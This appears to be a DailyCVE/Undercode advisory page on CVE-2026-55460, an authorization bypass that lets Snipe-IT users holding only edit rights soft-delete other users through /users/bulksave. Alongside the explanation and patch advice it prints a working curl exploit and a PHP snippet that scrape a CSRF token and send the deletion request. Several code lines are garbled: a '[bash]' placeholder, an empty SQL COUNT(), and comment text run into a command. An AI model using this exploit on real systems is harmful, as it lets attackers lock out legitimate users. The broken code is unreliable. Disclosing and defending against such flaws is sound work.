Snipe-IT Authorization Bypass, CVE-2026-55460 (High) -DC-Jul2026-883

Listen to this Post

How CVE-2026-55460 Works

Snipe-IT is an open‑source IT asset and license management system written in PHP (Laravel). Prior to version 8.6.2, the application suffers from an authorization bypass in its bulk user management functionality.
The vulnerability resides in the `BulkUsersController::destroy()` method, which is invoked when a user submits a POST request to the `/users/bulksave` endpoint. In a properly secured system, this controller should enforce that the requesting user possesses the `users.delete` permission before allowing any deletion operation. However, the developers only implemented an authorization check for the `update` action – they verified that the user had `users.edit` rights, but they did not verify `users.delete` when the `delete_user=1` parameter was present.
This means an authenticated, non‑administrator user who has been granted `users.view` and `users.edit` permissions (but explicitly not users.delete) can still trigger a soft‑delete of another non‑admin user by crafting a direct POST request to `/users/bulksave` with the `delete_user=1` flag. The controller accepts the request, processes the deletion, and never checks whether the actor is actually allowed to delete users.
The impact is limited to soft‑deletion – the target user is not permanently removed from the database, but their account is marked as deleted and becomes inactive. This can disrupt business workflows, remove legitimate users from the system, and potentially bypass audit trails. The attacker cannot delete administrator accounts, only other non‑admin users.
The vulnerability is classified under CWE‑863: Incorrect Authorization and carries a CVSS 3.1 score of 7.1 (High) with the vector `AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L` – meaning low‑privileged remote attackers can compromise integrity with no user interaction.
The issue was addressed in version 8.6.2 by adding proper permission validation inside BulkUsersController::destroy(), ensuring that the `users.delete` capability is now required for any deletion operation, even when invoked via the bulk endpoint.

DailyCVE Form

| Field | Value |

|-|-|

| Platform | Snipe‑IT |

| Version | < 8.6.2 |

| Vulnerability | Auth Bypass |

| Severity | High (7.1) |

| Date | 2026‑07‑10 |

| Prediction | Patch already released |

What Undercode Say: Analytics

Check installed Snipe-IT version
php artisan --version
Alternatively, check composer.json
cat composer.json | grep '"snipe/snipe-it"'
Search for vulnerable endpoints in logs
grep -r "/users/bulksave" storage/logs/laravel.log
Count soft-deleted users (if you have DB access)
mysql -u snipe_user -p snipe_db -e "SELECT COUNT() FROM users WHERE deleted_at IS NOT NULL;"

Sample exploit payload (curl):

Attacker obtains a valid CSRF token first (e.g., from the /users page)
CSRF_TOKEN="$(curl -s -b cookies.txt http://snipe.local/users | grep -oP 'name="_token" value="\K[^"]+')"
Craft the malicious POST to /users/bulksave
curl -X POST http://snipe.local/users/bulksave \
-H "Content-Type: application/x-www-form-urlencoded" \
-b cookies.txt \
-d "_token=${CSRF_TOKEN}" \
-d "delete_user=1" \
-d "user_ids[]=42" ID of target non-admin user

PHP exploit snippet (if attacker can inject code or use a custom module):

$client = new \GuzzleHttp\Client();
$response = $client->post('http://snipe.local/users/bulksave', [
'form_params' => [
'_token' => csrf_token(),
'delete_user' => 1,
'user_ids' => [bash]
],
'cookies' => $cookieJar
]);

Exploit

  • Prerequisites: Valid session of a user with `users.view` and `users.edit` permissions.
  • Attack vector: Direct HTTP POST to `/users/bulksave` with `delete_user=1` and a list of target user IDs.
  • No extra privileges needed: The attacker does not require `users.delete` – the missing check is exactly what enables the bypass.
  • Target scope: Only non‑administrator users can be soft‑deleted; admins are protected.
  • Real‑world impact: An attacker can quietly remove colleagues, contractors, or service accounts, causing operational disruption and data integrity issues.

Protection

  • Upgrade to Snipe‑IT version 8.6.2 or later – this is the only complete fix.
  • If upgrading is not immediately possible, review and restrict `users.edit` permissions to only trusted users (since anyone with `edit` can exploit the flaw).
  • Monitor logs for unexpected POST requests to `/users/bulksave` containing delete_user=1.
  • Implement WAF rules to block requests to `/users/bulksave` that include `delete_user=1` unless originating from trusted IPs (temporary workaround).
  • Audit existing user permissions – remove `users.edit` from users who do not genuinely need it.
  • Backup your database before applying any patches or manual fixes.

Impact

  • Integrity: High – an attacker can deactivate other user accounts without authorization.
  • Availability: Low – the system remains functional, but affected users lose access.
  • Confidentiality: None – no data is exposed; only user status is altered.
  • Business disruption: Legitimate users may be locked out, support tickets increase, and audit trails become unreliable.
  • Privilege escalation: Indirectly, the attacker elevates their effective control by removing other users, potentially clearing the way for further malicious actions.
  • Compliance risk: If the system is used in regulated environments, unauthorized account deactivation may violate data protection or access control policies.
  • Fix timeline: The vendor released version 8.6.2 on the same day the CVE was published (2026‑07‑10), so the patch is available immediately.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top